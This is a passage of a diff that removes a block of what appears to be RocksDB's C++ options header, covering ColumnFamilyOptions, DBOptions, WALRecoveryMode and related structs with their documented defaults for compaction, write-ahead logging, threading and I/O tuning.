-  // RocksDB that doesn't have kZSTD. Otherwise, you should use kZSTD. We will
-  // eventually remove the option from the public API.
-  kZSTDNotFinalCompression = 0x40,
-
-  // kDisableCompressionOption is used to disable some compression options.
-  kDisableCompressionOption = 0xff,
-};
-
-struct Options;
-
-struct ColumnFamilyOptions : public AdvancedColumnFamilyOptions {
-  // The function recovers options to a previous version. Only 4.6 or later
-  // versions are supported.
-  ColumnFamilyOptions* OldDefaults(int rocksdb_major_version = 4,
-                                   int rocksdb_minor_version = 6);
-
-  // Some functions that make it easier to optimize RocksDB
-  // Use this if your DB is very small (like under 1GB) and you don't want to
-  // spend lots of memory for memtables.
-  ColumnFamilyOptions* OptimizeForSmallDb();
-
-  // Use this if you don't need to keep the data sorted, i.e. you'll never use
-  // an iterator, only Put() and Get() API calls
-  //
-  // Not supported in ROCKSDB_LITE
-  ColumnFamilyOptions* OptimizeForPointLookup(
-      uint64_t block_cache_size_mb);
-
-  // Default values for some parameters in ColumnFamilyOptions are not
-  // optimized for heavy workloads and big datasets, which means you might
-  // observe write stalls under some conditions. As a starting point for tuning
-  // RocksDB options, use the following two functions:
-  // * OptimizeLevelStyleCompaction -- optimizes level style compaction
-  // * OptimizeUniversalStyleCompaction -- optimizes universal style compaction
-  // Universal style compaction is focused on reducing Write Amplification
-  // Factor for big data sets, but increases Space Amplification. You can learn
-  // more about the different styles here:
-  // https://github.com/facebook/rocksdb/wiki/Rocksdb-Architecture-Guide
-  // Make sure to also call IncreaseParallelism(), which will provide the
-  // biggest performance gains.
-  // Note: we might use more memory than memtable_memory_budget during high
-  // write rate period
-  //
-  // OptimizeUniversalStyleCompaction is not supported in ROCKSDB_LITE
-  ColumnFamilyOptions* OptimizeLevelStyleCompaction(
-      uint64_t memtable_memory_budget = 512 * 1024 * 1024);
-  ColumnFamilyOptions* OptimizeUniversalStyleCompaction(
-      uint64_t memtable_memory_budget = 512 * 1024 * 1024);
-
-  // -------------------
-  // Parameters that affect behavior
-
-  // Comparator used to define the order of keys in the table.
-  // Default: a comparator that uses lexicographic byte-wise ordering
-  //
-  // REQUIRES: The client must ensure that the comparator supplied
-  // here has the same name and orders keys *exactly* the same as the
-  // comparator provided to previous open calls on the same DB.
-  const Comparator* comparator = BytewiseComparator();
-
-  // REQUIRES: The client must provide a merge operator if Merge operation
-  // needs to be accessed. Calling Merge on a DB without a merge operator
-  // would result in Status::NotSupported. The client must ensure that the
-  // merge operator supplied here has the same name and *exactly* the same
-  // semantics as the merge operator provided to previous open calls on
-  // the same DB. The only exception is reserved for upgrade, where a DB
-  // previously without a merge operator is introduced to Merge operation
-  // for the first time. It's necessary to specify a merge operator when
-  // opening the DB in this case.
-  // Default: nullptr
-  std::shared_ptr<MergeOperator> merge_operator = nullptr;
-
-  // A single CompactionFilter instance to call into during compaction.
-  // Allows an application to modify/delete a key-value during background
-  // compaction.
-  //
-  // If the client requires a new compaction filter to be used for different
-  // compaction runs, it can specify compaction_filter_factory instead of this
-  // option.  The client should specify only one of the two.
-  // compaction_filter takes precedence over compaction_filter_factory if
-  // client specifies both.
-  //
-  // If multithreaded compaction is being used, the supplied CompactionFilter
-  // instance may be used from different threads concurrently and so should be
-  // thread-safe.
-  //
-  // Default: nullptr
-  const CompactionFilter* compaction_filter = nullptr;
-
-  // This is a factory that provides compaction filter objects which allow
-  // an application to modify/delete a key-value during background compaction.
-  //
-  // A new filter will be created on each compaction run.  If multithreaded
-  // compaction is being used, each created CompactionFilter will only be used
-  // from a single thread and so does not need to be thread-safe.
-  //
-  // Default: nullptr
-  std::shared_ptr<CompactionFilterFactory> compaction_filter_factory = nullptr;
-
-  // -------------------
-  // Parameters that affect performance
-
-  // Amount of data to build up in memory (backed by an unsorted log
-  // on disk) before converting to a sorted on-disk file.
-  //
-  // Larger values increase performance, especially during bulk loads.
-  // Up to max_write_buffer_number write buffers may be held in memory
-  // at the same time,
-  // so you may wish to adjust this parameter to control memory usage.
-  // Also, a larger write buffer will result in a longer recovery time
-  // the next time the database is opened.
-  //
-  // Note that write_buffer_size is enforced per column family.
-  // See db_write_buffer_size for sharing memory across column families.
-  //
-  // Default: 64MB
-  //
-  // Dynamically changeable through SetOptions() API
-  size_t write_buffer_size = 64 << 20;
-
-  // Compress blocks using the specified compression algorithm.  This
-  // parameter can be changed dynamically.
-  //
-  // Default: kSnappyCompression, if it's supported. If snappy is not linked
-  // with the library, the default is kNoCompression.
-  //
-  // Typical speeds of kSnappyCompression on an Intel(R) Core(TM)2 2.4GHz:
-  //    ~200-500MB/s compression
-  //    ~400-800MB/s decompression
-  // Note that these speeds are significantly faster than most
-  // persistent storage speeds, and therefore it is typically never
-  // worth switching to kNoCompression.  Even if the input data is
-  // incompressible, the kSnappyCompression implementation will
-  // efficiently detect that and will switch to uncompressed mode.
-  CompressionType compression;
-
-  // Compression algorithm that will be used for the bottommost level that
-  // contain files. If level-compaction is used, this option will only affect
-  // levels after base level.
-  //
-  // Default: kDisableCompressionOption (Disabled)
-  CompressionType bottommost_compression = kDisableCompressionOption;
-
-  // different options for compression algorithms
-  CompressionOptions compression_opts;
-
-  // Number of files to trigger level-0 compaction. A value <0 means that
-  // level-0 compaction will not be triggered by number of files at all.
-  //
-  // Default: 4
-  //
-  // Dynamically changeable through SetOptions() API
-  int level0_file_num_compaction_trigger = 4;
-
-  // If non-nullptr, use the specified function to determine the
-  // prefixes for keys.  These prefixes will be placed in the filter.
-  // Depending on the workload, this can reduce the number of read-IOP
-  // cost for scans when a prefix is passed via ReadOptions to
-  // db.NewIterator().  For prefix filtering to work properly,
-  // "prefix_extractor" and "comparator" must be such that the following
-  // properties hold:
-  //
-  // 1) key.starts_with(prefix(key))
-  // 2) Compare(prefix(key), key) <= 0.
-  // 3) If Compare(k1, k2) <= 0, then Compare(prefix(k1), prefix(k2)) <= 0
-  // 4) prefix(prefix(key)) == prefix(key)
-  //
-  // Default: nullptr
-  std::shared_ptr<const SliceTransform> prefix_extractor = nullptr;
-
-  // Control maximum total data size for a level.
-  // max_bytes_for_level_base is the max total for level-1.
-  // Maximum number of bytes for level L can be calculated as
-  // (max_bytes_for_level_base) * (max_bytes_for_level_multiplier ^ (L-1))
-  // For example, if max_bytes_for_level_base is 200MB, and if
-  // max_bytes_for_level_multiplier is 10, total data size for level-1
-  // will be 200MB, total file size for level-2 will be 2GB,
-  // and total file size for level-3 will be 20GB.
-  //
-  // Default: 256MB.
-  //
-  // Dynamically changeable through SetOptions() API
-  uint64_t max_bytes_for_level_base = 256 * 1048576;
-
-  // Disable automatic compactions. Manual compactions can still
-  // be issued on this column family
-  //
-  // Dynamically changeable through SetOptions() API
-  bool disable_auto_compactions = false;
-
-  // This is a factory that provides TableFactory objects.
-  // Default: a block-based table factory that provides a default
-  // implementation of TableBuilder and TableReader with default
-  // BlockBasedTableOptions.
-  std::shared_ptr<TableFactory> table_factory;
-
-  // Create ColumnFamilyOptions with default values for all fields
-  ColumnFamilyOptions();
-  // Create ColumnFamilyOptions from Options
-  explicit ColumnFamilyOptions(const Options& options);
-
-  void Dump(Logger* log) const;
-};
-
-enum class WALRecoveryMode : char {
-  // Original levelDB recovery
-  // We tolerate incomplete record in trailing data on all logs
-  // Use case : This is legacy behavior (default)
-  kTolerateCorruptedTailRecords = 0x00,
-  // Recover from clean shutdown
-  // We don't expect to find any corruption in the WAL
-  // Use case : This is ideal for unit tests and rare applications that
-  // can require high consistency guarantee
-  kAbsoluteConsistency = 0x01,
-  // Recover to point-in-time consistency
-  // We stop the WAL playback on discovering WAL inconsistency
-  // Use case : Ideal for systems that have disk controller cache like
-  // hard disk, SSD without super capacitor that store related data
-  kPointInTimeRecovery = 0x02,
-  // Recovery after a disaster
-  // We ignore any corruption in the WAL and try to salvage as much data as
-  // possible
-  // Use case : Ideal for last ditch effort to recover data or systems that
-  // operate with low grade unrelated data
-  kSkipAnyCorruptedRecords = 0x03,
-};
-
-struct DbPath {
-  std::string path;
-  uint64_t target_size;  // Target size of total files under the path, in byte.
-
-  DbPath() : target_size(0) {}
-  DbPath(const std::string& p, uint64_t t) : path(p), target_size(t) {}
-};
-
-
-struct DBOptions {
-  // The function recovers options to the option as in version 4.6.
-  DBOptions* OldDefaults(int rocksdb_major_version = 4,
-                         int rocksdb_minor_version = 6);
-
-  // Some functions that make it easier to optimize RocksDB
-
-  // Use this if your DB is very small (like under 1GB) and you don't want to
-  // spend lots of memory for memtables.
-  DBOptions* OptimizeForSmallDb();
-
-#ifndef ROCKSDB_LITE
-  // By default, RocksDB uses only one background thread for flush and
-  // compaction. Calling this function will set it up such that total of
-  // `total_threads` is used. Good value for `total_threads` is the number of
-  // cores. You almost definitely want to call this function if your system is
-  // bottlenecked by RocksDB.
-  DBOptions* IncreaseParallelism(int total_threads = 16);
-#endif  // ROCKSDB_LITE
-
-  // If true, the database will be created if it is missing.
-  // Default: false
-  bool create_if_missing = false;
-
-  // If true, missing column families will be automatically created.
-  // Default: false
-  bool create_missing_column_families = false;
-
-  // If true, an error is raised if the database already exists.
-  // Default: false
-  bool error_if_exists = false;
-
-  // If true, RocksDB will aggressively check consistency of the data.
-  // Also, if any of the  writes to the database fails (Put, Delete, Merge,
-  // Write), the database will switch to read-only mode and fail all other
-  // Write operations.
-  // In most cases you want this to be set to true.
-  // Default: true
-  bool paranoid_checks = true;
-
-  // Use the specified object to interact with the environment,
-  // e.g. to read/write files, schedule background work, etc.
-  // Default: Env::Default()
-  Env* env = Env::Default();
-
-  // Use to control write rate of flush and compaction. Flush has higher
-  // priority than compaction. Rate limiting is disabled if nullptr.
-  // If rate limiter is enabled, bytes_per_sync is set to 1MB by default.
-  // Default: nullptr
-  std::shared_ptr<RateLimiter> rate_limiter = nullptr;
-
-  // Use to track SST files and control their file deletion rate.
-  //
-  // Features:
-  //  - Throttle the deletion rate of the SST files.
-  //  - Keep track the total size of all SST files.
-  //  - Set a maximum allowed space limit for SST files that when reached
-  //    the DB wont do any further flushes or compactions and will set the
-  //    background error.
-  //  - Can be shared between multiple dbs.
-  // Limitations:
-  //  - Only track and throttle deletes of SST files in
-  //    first db_path (db_name if db_paths is empty).
-  //
-  // Default: nullptr
-  std::shared_ptr<SstFileManager> sst_file_manager = nullptr;
-
-  // Any internal progress/error information generated by the db will
-  // be written to info_log if it is non-nullptr, or to a file stored
-  // in the same directory as the DB contents if info_log is nullptr.
-  // Default: nullptr
-  std::shared_ptr<Logger> info_log = nullptr;
-
-#ifdef NDEBUG
-      InfoLogLevel info_log_level = INFO_LEVEL;
-#else
-      InfoLogLevel info_log_level = DEBUG_LEVEL;
-#endif  // NDEBUG
-
-  // Number of open files that can be used by the DB.  You may need to
-  // increase this if your database has a large working set. Value -1 means
-  // files opened are always kept open. You can estimate number of files based
-  // on target_file_size_base and target_file_size_multiplier for level-based
-  // compaction. For universal-style compaction, you can usually set it to -1.
-  // Default: -1
-  int max_open_files = -1;
-
-  // If max_open_files is -1, DB will open all files on DB::Open(). You can
-  // use this option to increase the number of threads used to open the files.
-  // Default: 16
-  int max_file_opening_threads = 16;
-
-  // Once write-ahead logs exceed this size, we will start forcing the flush of
-  // column families whose memtables are backed by the oldest live WAL file
-  // (i.e. the ones that are causing all the space amplification). If set to 0
-  // (default), we will dynamically choose the WAL size limit to be
-  // [sum of all write_buffer_size * max_write_buffer_number] * 4
-  // Default: 0
-  uint64_t max_total_wal_size = 0;
-
-  // If non-null, then we should collect metrics about database operations
-  std::shared_ptr<Statistics> statistics = nullptr;
-
-  // If true, then every store to stable storage will issue a fsync.
-  // If false, then every store to stable storage will issue a fdatasync.
-  // This parameter should be set to true while storing data to
-  // filesystem like ext3 that can lose files after a reboot.
-  // Default: false
-  // Note: on many platforms fdatasync is defined as fsync, so this parameter
-  // would make no difference. Refer to fdatasync definition in this code base.
-  bool use_fsync = false;
-
-  // A list of paths where SST files can be put into, with its target size.
-  // Newer data is placed into paths specified earlier in the vector while
-  // older data gradually moves to paths specified later in the vector.
-  //
-  // For example, you have a flash device with 10GB allocated for the DB,
-  // as well as a hard drive of 2TB, you should config it to be:
-  //   [{"/flash_path", 10GB}, {"/hard_drive", 2TB}]
-  //
-  // The system will try to guarantee data under each path is close to but
-  // not larger than the target size. But current and future file sizes used
-  // by determining where to place a file are based on best-effort estimation,
-  // which means there is a chance that the actual size under the directory
-  // is slightly more than target size under some workloads. User should give
-  // some buffer room for those cases.
-  //
-  // If none of the paths has sufficient room to place a file, the file will
-  // be placed to the last path anyway, despite to the target size.
-  //
-  // Placing newer data to earlier paths is also best-efforts. User should
-  // expect user files to be placed in higher levels in some extreme cases.
-  //
-  // If left empty, only one path will be used, which is db_name passed when
-  // opening the DB.
-  // Default: empty
-  std::vector<DbPath> db_paths;
-
-  // This specifies the info LOG dir.
-  // If it is empty, the log files will be in the same dir as data.
-  // If it is non empty, the log files will be in the specified dir,
-  // and the db data dir's absolute path will be used as the log file
-  // name's prefix.
-  std::string db_log_dir = "";
-
-  // This specifies the absolute dir path for write-ahead logs (WAL).
-  // If it is empty, the log files will be in the same dir as data,
-  //   dbname is used as the data dir by default
-  // If it is non empty, the log files will be in kept the specified dir.
-  // When destroying the db,
-  //   all log files in wal_dir and the dir itself is deleted
-  std::string wal_dir = "";
-
-  // The periodicity when obsolete files get deleted. The default
-  // value is 6 hours. The files that get out of scope by compaction
-  // process will still get automatically delete on every compaction,
-  // regardless of this setting
-  uint64_t delete_obsolete_files_period_micros = 6ULL * 60 * 60 * 1000000;
-
-  // Maximum number of concurrent background jobs (compactions and flushes).
-  int max_background_jobs = 2;
-
-  // NOT SUPPORTED ANYMORE: RocksDB automatically decides this based on the
-  // value of max_background_jobs. This option is ignored.
-  int base_background_compactions = -1;
-
-  // NOT SUPPORTED ANYMORE: RocksDB automatically decides this based on the
-  // value of max_background_jobs. For backwards compatibility we will set
-  // `max_background_jobs = max_background_compactions + max_background_flushes`
-  // in the case where user sets at least one of `max_background_compactions` or
-  // `max_background_flushes` (we replace -1 by 1 in case one option is unset).
-  //
-  // Maximum number of concurrent background compaction jobs, submitted to
-  // the default LOW priority thread pool.
-  //
-  // If you're increasing this, also consider increasing number of threads in
-  // LOW priority thread pool. For more information, see
-  // Env::SetBackgroundThreads
-  // Default: -1
-  int max_background_compactions = -1;
-
-  // This value represents the maximum number of threads that will
-  // concurrently perform a compaction job by breaking it into multiple,
-  // smaller ones that are run simultaneously.
-  // Default: 1 (i.e. no subcompactions)
-  uint32_t max_subcompactions = 1;
-
-  // NOT SUPPORTED ANYMORE: RocksDB automatically decides this based on the
-  // value of max_background_jobs. For backwards compatibility we will set
-  // `max_background_jobs = max_background_compactions + max_background_flushes`
-  // in the case where user sets at least one of `max_background_compactions` or
-  // `max_background_flushes`.
-  //
-  // Maximum number of concurrent background memtable flush jobs, submitted by
-  // default to the HIGH priority thread pool. If the HIGH priority thread pool
-  // is configured to have zero threads, flush jobs will share the LOW priority
-  // thread pool with compaction jobs.
-  //
-  // It is important to use both thread pools when the same Env is shared by
-  // multiple db instances. Without a separate pool, long running compaction
-  // jobs could potentially block memtable flush jobs of other db instances,
-  // leading to unnecessary Put stalls.
-  //
-  // If you're increasing this, also consider increasing number of threads in
-  // HIGH priority thread pool. For more information, see
-  // Env::SetBackgroundThreads
-  // Default: -1
-  int max_background_flushes = -1;
-
-  // Specify the maximal size of the info log file. If the log file
-  // is larger than `max_log_file_size`, a new info log file will
-  // be created.
-  // If max_log_file_size == 0, all logs will be written to one
-  // log file.
-  size_t max_log_file_size = 0;
-
-  // Time for the info log file to roll (in seconds).
-  // If specified with non-zero value, log file will be rolled
-  // if it has been active longer than `log_file_time_to_roll`.
-  // Default: 0 (disabled)
-  // Not supported in ROCKSDB_LITE mode!
-  size_t log_file_time_to_roll = 0;
-
-  // Maximal info log files to be kept.
-  // Default: 1000
-  size_t keep_log_file_num = 1000;
-
-  // Recycle log files.
-  // If non-zero, we will reuse previously written log files for new
-  // logs, overwriting the old data.  The value indicates how many
-  // such files we will keep around at any point in time for later
-  // use.  This is more efficient because the blocks are already
-  // allocated and fdatasync does not need to update the inode after
-  // each write.
-  // Default: 0
-  size_t recycle_log_file_num = 0;
-
-  // manifest file is rolled over on reaching this limit.
-  // The older manifest file be deleted.
-  // The default value is MAX_INT so that roll-over does not take place.
-  uint64_t max_manifest_file_size = std::numeric_limits<uint64_t>::max();
-
-  // Number of shards used for table cache.
-  int table_cache_numshardbits = 6;
-
-  // NOT SUPPORTED ANYMORE
-  // int table_cache_remove_scan_count_limit;
-
-  // The following two fields affect how archived logs will be deleted.
-  // 1. If both set to 0, logs will be deleted asap and will not get into
-  //    the archive.
-  // 2. If WAL_ttl_seconds is 0 and WAL_size_limit_MB is not 0,
-  //    WAL files will be checked every 10 min and if total size is greater
-  //    then WAL_size_limit_MB, they will be deleted starting with the
-  //    earliest until size_limit is met. All empty files will be deleted.
-  // 3. If WAL_ttl_seconds is not 0 and WAL_size_limit_MB is 0, then
-  //    WAL files will be checked every WAL_ttl_secondsi / 2 and those that
-  //    are older than WAL_ttl_seconds will be deleted.
-  // 4. If both are not 0, WAL files will be checked every 10 min and both
-  //    checks will be performed with ttl being first.
-  uint64_t WAL_ttl_seconds = 0;
-  uint64_t WAL_size_limit_MB = 0;
-
-  // Number of bytes to preallocate (via fallocate) the manifest
-  // files.  Default is 4mb, which is reasonable to reduce random IO
-  // as well as prevent overallocation for mounts that preallocate
-  // large amounts of data (such as xfs's allocsize option).
-  size_t manifest_preallocation_size = 4 * 1024 * 1024;
-
-  // Allow the OS to mmap file for reading sst tables. Default: false
-  bool allow_mmap_reads = false;
-
-  // Allow the OS to mmap file for writing.
-  // DB::SyncWAL() only works if this is set to false.
-  // Default: false
-  bool allow_mmap_writes = false;
-
-  // Enable direct I/O mode for read/write
-  // they may or may not improve performance depending on the use case
-  //
-  // Files will be opened in "direct I/O" mode
-  // which means that data r/w from the disk will not be cached or
-  // buffered. The hardware buffer of the devices may however still
-  // be used. Memory mapped files are not impacted by these parameters.
-
-  // Use O_DIRECT for user reads
-  // Default: false
-  // Not supported in ROCKSDB_LITE mode!
-  bool use_direct_reads = false;
-
-  // Use O_DIRECT for both reads and writes in background flush and compactions
-  // When true, we also force new_table_reader_for_compaction_inputs to true.
-  // Default: false
-  // Not supported in ROCKSDB_LITE mode!
-  bool use_direct_io_for_flush_and_compaction = false;
-
-  // If false, fallocate() calls are bypassed
-  bool allow_fallocate = true;
-
-  // Disable child process inherit open files. Default: true
-  bool is_fd_close_on_exec = true;
-
-  // NOT SUPPORTED ANYMORE -- this options is no longer used
-  bool skip_log_error_on_recovery = false;
-
-  // if not zero, dump rocksdb.stats to LOG every stats_dump_period_sec
-  // Default: 600 (10 min)
-  unsigned int stats_dump_period_sec = 600;
-
-  // If set true, will hint the underlying file system that the file
-  // access pattern is random, when a sst file is opened.
-  // Default: true
-  bool advise_random_on_open = true;
-
-  // Amount of data to build up in memtables across all column
-  // families before writing to disk.
-  //
-  // This is distinct from write_buffer_size, which enforces a limit
-  // for a single memtable.
-  //
-  // This feature is disabled by default. Specify a non-zero value
-  // to enable it.
-  //
-  // Default: 0 (disabled)
-  size_t db_write_buffer_size = 0;
-
-  // The memory usage of memtable will report to this object. The same object
-  // can be passed into multiple DBs and it will track the sum of size of all
-  // the DBs. If the total size of all live memtables of all the DBs exceeds
-  // a limit, a flush will be triggered in the next DB to which the next write
-  // is issued.
-  //
-  // If the object is only passed to on DB, the behavior is the same as
-  // db_write_buffer_size. When write_buffer_manager is set, the value set will
-  // override db_write_buffer_size.
-  //
-  // This feature is disabled by default. Specify a non-zero value
-  // to enable it.
-  //
-  // Default: null
-  std::shared_ptr<WriteBufferManager> write_buffer_manager = nullptr;
-
-  // Specify the file access pattern once a compaction is started.
-  // It will be applied to all input files of a compaction.
-  // Default: NORMAL
-  enum AccessHint {
-      NONE,
-      NORMAL,
-      SEQUENTIAL,
-      WILLNEED
-  };
-  AccessHint access_hint_on_compaction_start = NORMAL;
-
-  // If true, always create a new file descriptor and new table reader
-  // for compaction inputs. Turn this parameter on may introduce extra
-  // memory usage in the table reader, if it allocates extra memory
-  // for indexes. This will allow file descriptor prefetch options
-  // to be set for compaction input files and not to impact file
-  // descriptors for the same file used by user queries.
-  // Suggest to enable BlockBasedTableOptions.cache_index_and_filter_blocks
-  // for this mode if using block-based table.
-  //
-  // Default: false
-  bool new_table_reader_for_compaction_inputs = false;
-
-  // If non-zero, we perform bigger reads when doing compaction. If you're
-  // running RocksDB on spinning disks, you should set this to at least 2MB.
-  // That way RocksDB's compaction is doing sequential instead of random reads.
-  //
-  // When non-zero, we also force new_table_reader_for_compaction_inputs to
-  // true.
-  //
-  // Default: 0
-  size_t compaction_readahead_size = 0;
-
-  // This is a maximum buffer size that is used by WinMmapReadableFile in
-  // unbuffered disk I/O mode. We need to maintain an aligned buffer for
-  // reads. We allow the buffer to grow until the specified value and then
-  // for bigger requests allocate one shot buffers. In unbuffered mode we
-  // always bypass read-ahead buffer at ReadaheadRandomAccessFile
-  // When read-ahead is required we then make use of compaction_readahead_size
-  // value and always try to read ahead. With read-ahead we always
-  // pre-allocate buffer to the size instead of growing it up to a limit.
-  //
-  // This option is currently honored only on Windows
-  //
-  // Default: 1 Mb
-  //
-  // Special value: 0 - means do not maintain per instance buffer. Allocate
-  //                per request buffer and avoid locking.
-  size_t random_access_max_buffer_size = 1024 * 1024;
-
-  // This is the maximum buffer size that is used by WritableFileWriter.
-  // On Windows, we need to maintain an aligned buffer for writes.
-  // We allow the buffer to grow until it's size hits the limit in buffered
-  // IO and fix the buffer size when using direct IO to ensure alignment of
-  // write requests if the logical sector size is unusual
-  //
-  // Default: 1024 * 1024 (1 MB)
-  size_t writable_file_max_buffer_size = 1024 * 1024;
-
-
-  // Use adaptive mutex, which spins in the user space before resorting
-  // to kernel. This could reduce context switch when the mutex is not
-  // heavily contended. However, if the mutex is hot, we could end up
-  // wasting spin time.
-  // Default: false
-  bool use_adaptive_mutex = false;
-
-  // Create DBOptions with default values for all fields
-  DBOptions();
-  // Create DBOptions from Options
-  explicit DBOptions(const Options& options);
-
-  void Dump(Logger* log) const;
-
-  // Allows OS to incrementally sync files to disk while they are being
-  // written, asynchronously, in the background. This operation can be used
-  // to smooth out write I/Os over time. Users shouldn't rely on it for
-  // persistency guarantee.
-  // Issue one request for every bytes_per_sync written. 0 turns it off.
-  // Default: 0
-  //
-  // You may consider using rate_limiter to regulate write rate to device.
-  // When rate limiter is enabled, it automatically enables bytes_per_sync
-  // to 1MB.
-  //
-  // This option applies to table files
-  uint64_t bytes_per_sync = 0;
-
-  // Same as bytes_per_sync, but applies to WAL files
-  // Default: 0, turned off
-  uint64_t wal_bytes_per_sync = 0;
-
-  // A vector of EventListeners which call-back functions will be called
-  // when specific RocksDB event happens.
-  std::vector<std::shared_ptr<EventListener>> listeners;
-
-  // If true, then the status of the threads involved in this DB will
-  // be tracked and available via GetThreadList() API.
-  //
-  // Default: false
-  bool enable_thread_tracking = false;
-
-  // The limited write rate to DB if soft_pending_compaction_bytes_limit or
-  // level0_slowdown_writes_trigger is triggered, or we are writing to the
-  // last mem table allowed and we allow more than 3 mem tables. It is
-  // calculated using size of user write requests before compression.
-  // RocksDB may decide to slow down more if the compaction still
-  // gets behind further.
-  // If the value is 0, we will infer a value from `rater_limiter` value
-  // if it is not empty, or 16MB if `rater_limiter` is empty. Note that
-  // if users change the rate in `rate_limiter` after DB is opened,
-  // `delayed_write_rate` won't be adjusted.
-  //
-  // Unit: byte per second.
-  //
-  // Default: 0
-  uint64_t delayed_write_rate = 0;
-
-  // By default, a single write thread queue is maintained. The thread gets
-  // to the head of the queue becomes write batch group leader and responsible
-  // for writing to WAL and memtable for the batch group.
-  //
-  // If enable_pipelined_write is true, separate write thread queue is
-  // maintained for WAL write and memtable write. A write thread first enter WAL
-  // writer queue and then memtable writer queue. Pending thread on the WAL
-  // writer queue thus only have to wait for previous writers to finish their
-  // WAL writing but not the memtable writing. Enabling the feature may improve
-  // write throughput and reduce latency of the prepare phase of two-phase
-  // commit.
-  //
-  // Default: false
-  bool enable_pipelined_write = false;
-
-  // If true, allow multi-writers to update mem tables in parallel.
-  // Only some memtable_factory-s support concurrent writes; currently it
-  // is implemented only for SkipListFactory.  Concurrent memtable writes
-  // are not compatible with inplace_update_support or filter_deletes.
-  // It is strongly recommended to set enable_write_thread_adaptive_yield
-  // if you are going to use this feature.
-  //
-  // Default: true
-  bool allow_concurrent_memtable_write = true;
-
-  // If true, threads synchronizing with the write batch group leader will
-  // wait for up to write_thread_max_yield_usec before blocking on a mutex.
-  // This can substantially improve throughput for concurrent workloads,
-  // regardless of whether allow_concurrent_memtable_write is enabled.
-  //
-  // Default: true
-  bool enable_write_thread_adaptive_yield = true;
-
-  // The maximum number of microseconds that a write operation will use
-  // a yielding spin loop to coordinate with other write threads before
-  // blocking on a mutex.  (Assuming write_thread_slow_yield_usec is
-  // set properly) increasing this value is likely to increase RocksDB
-  // throughput at the expense of increased CPU usage.
-  //
-  // Default: 100
-  uint64_t write_thread_max_yield_usec = 100;
-
-  // The latency in microseconds after which a std::this_thread::yield
-  // call (sched_yield on Linux) is considered to be a signal that
-  // other processes or threads would like to use the current core.
-  // Increasing this makes writer threads more likely to take CPU
-  // by spinning, which will show up as an increase in the number of
-  // involuntary context switches.
-  //
-  // Default: 3
-  uint64_t write_thread_slow_yield_usec = 3;
-
-  // If true, then DB::Open() will not update the statistics used to optimize
-  // compaction decision by loading table properties from many files.
-  // Turning off this feature will improve DBOpen time especially in
-  // disk environment.
-  //
-  // Default: false
-  bool skip_stats_update_on_db_open = false;
-
-  // Recovery mode to control the consistency while replaying WAL
-  // Default: kPointInTimeRecovery
-  WALRecoveryMode wal_recovery_mode = WALRecoveryMode::kPointInTimeRecovery;
-
-  // if set to false then recovery will fail when a prepared
-  // transaction is encountered in the WAL
-  bool allow_2pc = false;
-
-  // A global cache for table-level rows.
-  // Default: nullptr (disabled)
-  // Not supported in ROCKSDB_LITE mode!
-  std::shared_ptr<Cache> row_cache = nullptr;
-
-#ifndef ROCKSDB_LITE
-  // A filter object supplied to be invoked while processing write-ahead-logs
-  // (WALs) during recovery. The filter provides a way to inspect log
-  // records, ignoring a particular record or skipping replay.
-  // The filter is invoked at startup and is invoked from a single-thread
-  // currently.
-  WalFilter* wal_filter = nullptr;
-#endif  // ROCKSDB_LITE
-
-  // If true, then DB::Open / CreateColumnFamily / DropColumnFamily
-  // / SetOptions will fail if options file is not detected or properly
-  // persisted.
-  //
-  // DEFAULT: false
-  bool fail_if_options_file_error = false;
-
-  // If true, then print malloc stats together with rocksdb.stats
-  // when printing to LOG.
-  // DEFAULT: false
-  bool dump_malloc_stats = false;
-
-  // By default RocksDB replay WAL logs and flush them on DB open, which may
-  // create very small SST files. If this option is enabled, RocksDB will try
-  // to avoid (but not guarantee not to) flush during recovery. Also, existing
-  // WAL logs will be kept, so that if crash happened before flush, we still
-  // have logs to recover from.
-  //
-  // DEFAULT: false
-  bool avoid_flush_during_recovery = false;
-
-  // By default RocksDB will flush all memtables on DB close if there are
-  // unpersisted data (i.e. with WAL disabled) The flush can be skip to speedup
-  // DB close. Unpersisted data WILL BE LOST.
-  //
-  // DEFAULT: false
-  //
-  // Dynamically changeable through SetDBOptions() API.
-  bool avoid_flush_during_shutdown = false;
-
-  // Set this option to true during creation of database if you want
-  // to be able to ingest behind (call IngestExternalFile() skipping keys
-  // that already exist, rather than overwriting matching keys).
-  // Setting this option to true will affect 2 things:
-  // 1) Disable some internal optimizations around SST file compression
-  // 2) Reserve bottom-most level for ingested files only.
-  // 3) Note that num_levels should be >= 3 if this option is turned on.
-  //
-  // DEFAULT: false
-  // Immutable.
-  bool allow_ingest_behind = false;
-
-  // If enabled it uses two queues for writes, one for the ones with
-  // disable_memtable and one for the ones that also write to memtable. This
-  // allows the memtable writes not to lag behind other writes. It can be used
-  // to optimize MySQL 2PC in which only the commits, which are serial, write to
-  // memtable.
-  bool concurrent_prepare = false;
-
-  // If true WAL is not flushed automatically after each write. Instead it
-  // relies on manual invocation of FlushWAL to write the WAL buffer to its
-  // file.
-  bool manual_wal_flush = false;
-};
-
-// Options to control the behavior of a database (passed to DB::Open)
-struct Options : public DBOptions, public ColumnFamilyOptions {
-  // Create an Options object with default values for all fields.
-  Options() : DBOptions(), ColumnFamilyOptions() {}
-
-  Options(const DBOptions& db_options,
-          const ColumnFamilyOptions& column_family_options)
-      : DBOptions(db_options), ColumnFamilyOptions(column_family_options) {}
-
-  // The function recovers options to the option as in version 4.6.
-  Options* OldDefaults(int rocksdb_major_version = 4,
-                       int rocksdb_minor_version = 6);
-
-  void Dump(Logger* log) const;
-
-  void DumpCFOptions(Logger* log) const;
-
-  // Some functions that make it easier to optimize RocksDB
-
-  // Set appropriate parameters for bulk loading.
-  // The reason that this is a function that returns "this" instead of a
-  // constructor is to enable chaining of multiple similar calls in the future.
-  //
-
-  // All data will be in level 0 without any automatic compaction.
-  // It's recommended to manually call CompactRange(NULL, NULL) before reading
-  // from the database, because otherwise the read can be very slow.
-  Options* PrepareForBulkLoad();
-
-  // Use this if your DB is very small (like under 1GB) and you don't want to
-  // spend lots of memory for memtables.
-  Options* OptimizeForSmallDb();
-};
-
-//
-// An application can issue a read request (via Get/Iterators) and specify
-// if that read should process data that ALREADY resides on a specified cache
-// level. For example, if an application specifies kBlockCacheTier then the
-// Get call will process data that is already processed in the memtable or
-// the block cache. It will not page in data from the OS cache or data that
-// resides in storage.
-enum ReadTier {
-  kReadAllTier = 0x0,     // data in memtable, block cache, OS cache or storage
-  kBlockCacheTier = 0x1,  // data in memtable or block cache
-  kPersistedTier = 0x2,   // persisted data.  When WAL is disabled, this option
-                          // will skip data in memtable.
-                          // Note that this ReadTier currently only supports
